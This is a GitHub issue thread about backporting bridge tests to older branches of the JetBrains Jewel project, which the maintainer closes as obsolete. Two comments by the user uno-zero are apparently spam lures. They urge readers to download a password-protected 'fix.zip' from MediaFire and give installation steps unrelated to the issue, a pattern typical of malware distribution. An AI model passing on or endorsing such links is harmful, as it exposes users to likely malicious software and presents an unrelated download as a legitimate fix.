### ISSUE TITLE
Backport bridge tests to 233 and 241 branches

### ISSUE THREAD

**Issue by rock3r** [JetBrains/jewel#561]
The tests module is not trivial to backport to 233/241 because those branches use the older Gradle IJ plugin. As of 0.23.0, they have been removed from the older branches as I did not have the time to study how it works and backport it all.

This is an issue to track that they need to be properly backported.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rock3r** [comment]
Closing as obsolete — these will be ported in the IJP.
